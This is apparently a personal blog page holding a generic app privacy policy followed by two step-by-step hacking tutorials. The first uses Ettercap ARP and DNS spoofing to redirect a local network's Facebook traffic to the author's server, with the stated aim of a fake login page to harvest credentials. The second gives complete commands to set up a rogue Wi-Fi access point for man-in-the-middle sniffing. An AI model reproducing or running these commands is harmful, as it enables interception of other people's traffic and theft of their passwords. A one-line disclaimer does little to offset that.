onsdag 14. november 2018

Hvem eier bilen - Privacy Policy

App Privacy Policy Generator

Privacy Policy

built the Hvem eier bilen app as a Free app. This SERVICE is provided by at no cost and is intended for use as is.
This page is used to inform visitors regarding my policies with the collection, use, and disclosure of Personal Information if anyone decided to use my Service.
If you choose to use my Service, then you agree to the collection and use of information in relation to this policy. The Personal Information that I collect is used for providing and improving the Service. I will not use or share your information with anyone except as described in this Privacy Policy.
The terms used in this Privacy Policy have the same meanings as in our Terms and Conditions, which is accessible at Hvem eier bilen unless otherwise defined in this Privacy Policy.
Information Collection and Use
For a better experience, while using our Service, I may require you to provide us with certain personally identifiable information. The information that I request will be retained on your device and is not collected by me in any way.
The app does use third party services that may collect information used to identify you.
Link to privacy policy of third party service providers used by the app
Log Data
I want to inform you that whenever you use my Service, in a case of an error in the app I collect data and information (through third party products) on your phone called Log Data. This Log Data may include information such as your device Internet Protocol (“IP”) address, device name, operating system version, the configuration of the app when utilizing my Service, the time and date of your use of the Service, and other statistics.
Cookies
Cookies are files with a small amount of data that are commonly used as anonymous unique identifiers. These are sent to your browser from the websites that you visit and are stored on your device's internal memory.
This Service does not use these “cookies” explicitly. However, the app may use third party code and libraries that use “cookies” to collect information and improve their services. You have the option to either accept or refuse these cookies and know when a cookie is being sent to your device. If you choose to refuse our cookies, you may not be able to use some portions of this Service.
Service Providers
I may employ third-party companies and individuals due to the following reasons:
  • To facilitate our Service;
  • To provide the Service on our behalf;
  • To perform Service-related services; or
  • To assist us in analyzing how our Service is used.
I want to inform users of this Service that these third parties have access to your Personal Information. The reason is to perform the tasks assigned to them on our behalf. However, they are obligated not to disclose or use the information for any other purpose.
Security
I value your trust in providing us your Personal Information, thus we are striving to use commercially acceptable means of protecting it. But remember that no method of transmission over the internet, or method of electronic storage is 100% secure and reliable, and I cannot guarantee its absolute security.
Links to Other Sites
This Service may contain links to other sites. If you click on a third-party link, you will be directed to that site. Note that these external sites are not operated by me. Therefore, I strongly advise you to review the Privacy Policy of these websites. I have no control over and assume no responsibility for the content, privacy policies, or practices of any third-party sites or services.
Children’s Privacy
These Services do not address anyone under the age of 13. I do not knowingly collect personally identifiable information from children under 13. In the case I discover that a child under 13 has provided me with personal information, I immediately delete this from our servers. If you are a parent or guardian and you are aware that your child has provided us with personal information, please contact me so that I will be able to do necessary actions.
Changes to This Privacy Policy
I may update our Privacy Policy from time to time. Thus, you are advised to review this page periodically for any changes. I will notify you of any changes by posting the new Privacy Policy on this page. These changes are effective immediately after they are posted on this page.
Contact Us
If you have any questions or suggestions about my Privacy Policy, do not hesitate to contact me.
This privacy policy page was created at privacypolicytemplate.net and modified/generated by App Privacy Policy Generator

lørdag 18. mai 2013

Redirect someone to a different website (ARP spoofing) PART 1

Ok, this time I'am going to show you how to redirect some one to a different website. I will just go through the basic for now, and later one we are going to combine all of the steps in to one "hack attack". 

NOTE: this technique will only work one your local network (cable, wifi).

DON NOT preform this kind of actions on other networks/computers than your own!  


For this attack we are going to preform something called ARP spoofing. ARP spoofing is a technique in which a computer on the local network can "poison" the ARP table of another host causing it to send packets to the wrong destination. 





The image above helps explaining how ARP spoofing works. Now if the victim surfs the internet all the traffic is going through the attackers computer, in that way the attacker can monitor which sites the victim is visiting. The attacker can even sniff password or redirect the victim to another site. 

There are a couple of tools that can be used for this type of attack, but for this tutorial we are going to use "Ettercap" which comes preinstalled on BackTrack/Kali.


And here are the steps:

Step nr 1:

First you need to find out what your IP-address on the local network is. 

Type:
  • ifconfig 
Here is a screen shot of what you will see after you have typed in the command above:




Write down the IP for your working internet connection (I'am going to use my cable connection for this tutorial ), we are going to use it in the next step.


Step nr 2:

Now we need to edit etter.dns and add the name of the website which we want the victim to get redirected to (facebook in this case). 

Type:
  • nano /etc/ettercap/etter.dns
Now add this tre lines to the bottom of the file:

facebook.com      A    10.0.0.97   

*.facebbok.com    A    10.0.0.97

*.facebook.*      A    10.0.0.97


Just remember to change 10.0.0.97 to your own IP which you wrote down in the first step!

After you are are done, exit and save (hit Ctrl + x and then hit Y and then hit enter)


Step nr 2.5 (Optional):

Since all hosts on our LAN are going to visit our server, you can change what message they will be presented with instead of facebook.

Type:

  • nano /var/www/index.html

Just change the HTML content to what ever you want people to see instead, then save and exit. 
Now you need to restart your apache server in order for the changes to take affect. 

Type:

  • service apache2 restart


Step nr 3:

Lets start Ettercap end redirect people.

Type:

  • ettercap -T -q -M arp -P dns_spoof // // -i eth0
Now try to visit facebook with another computer or what ever you have and see what happens.

Screen shot of what other computers will see when they try to visit facebook:





NOTE: This hack will not work if you try to visit facebook with a smartphone app, you have to use a web browser for this to work.

Here is an explanation for the command above:

T       = text mode
q       =  quit mode
M     =  man in the middle
P      =  plugin
// //   =  specify all host   


The reason to why we redirect all traffic to facbook to our local IP (apache server), is because we later on are going to put up a fake facebook login site and trick other computers on the local network to reveal their credentials. 



søndag 5. mai 2013

How to manually setup a rogue / fake access point

For some days ago I needed to setup a fake access point (for testing purposes of course), so I decided
to configure every thing manually instead of using automated tools like "easycreds". I'am not saying that tools like "easycreds" are bad, it's just that I like to do things manually instead of using scripts. Once you know the basics of configure every thing manually, you can always make your own script (we will do that some other time).


What is a rogue / fake access point


A simple explanation of a fake AP is: "A wireless access point" that has been created to allow a hacker to conduct a man-in-the-middle-attack.


We will not bother with preforming SSL-Strip, dns-spoofing etc this time, just setting up the Fake AP.


And here are the steps:

I have connected my laptop to the internet with kable  (eth0) and my laptop's wifi card (wlan0) is free for setting up the the fake AP.  

If you have to wireless interfaces (usb dongle), then you can connect one of them to the internet and use the other one to setup a evil AP (Just remember to change the outgoing interface in step 7). 


STEP 1:

Download "Dhcp3-server".


  • root@bt:~# sudo apt-get install dhcp3-server


STEP 2: 

Make a backup of the default dhcp config file (the default config file is located under "/etc/dhcp3/dhcpd.conf").


  • root@bt:~# mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup


Make and edit the config file


  • root@bt:~# nano /etc/dhcp3/dhcpd.conf



Now just add (copy / paste) this in to the config file:


ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 192.168.0.0 netmask 255.255.255.0 {
        option subnet-mask 255.255.255.0;
        option broadcast-address 192.168.0.255;
        option routers 192.168.0.1;
        option domain-name-servers 8.8.8.8;
        range 192.168.0.130  192.168.0.140;
}




STEP 3:

Put your wifi card in monitor mode and then start airbase-ng.


  • root@bt:~# airmon-ng start wlan0

  • root@bt:~# airbase-ng -e "the name of the fake ap (SSID)" -c "channel nr" mon0


Her is an example on the last command in step 3:


  • root@bt:~# airbase-ng -e FakeAp -c 2 mon0


STEP 4:

Airbase will create a new interface “at0″ you will need to enable it and assign it with an ip address and subnet mask, the ip address you assign to this interface will be the default gateway that you specified in the dhcpd.conf file.

  • root@bt:~# ifconfig at0 up

  • root@bt:~# ifconfig at0 192.168.0.1 netmask 255.255.255.0

STEP 5:

Add a route 

  • root@bt:~# route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1 dev at0

STEP  6:

Specify  the interface you are pointing to using the file we created. 

  • root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
And now start the dhcp server.

  • root@bt:~# service dhcp3-server start

STEP 7 (Final step):

Flush the iptables.

  • root@bt:~# iptables --flush 
  • root@bt:~# iptables --table nat --flush
  • root@bt:~# iptables --delete-chain
  • root@bt:~# iptables --table nat --delete-chain
  • root@bt:~# iptables -P FORWARD ACCEPT 
  • root@bt:~# iptables -t nat -A POSTROUTING -o eth0 -j MASQURADE
(remeber that eth0 is the interface that are alredy connected to the internet, a kabel connection in this case)
  • root@bt:~# echo "1" > /proc/sys/net/ipv4/ip_forward


That's it! You can connect to the new access point  with your smart phone, laptop etc and surf the internet like it was a regular hotspot. But and attacker could use this technique to sniff username, passwords, redirect people to malicious sites.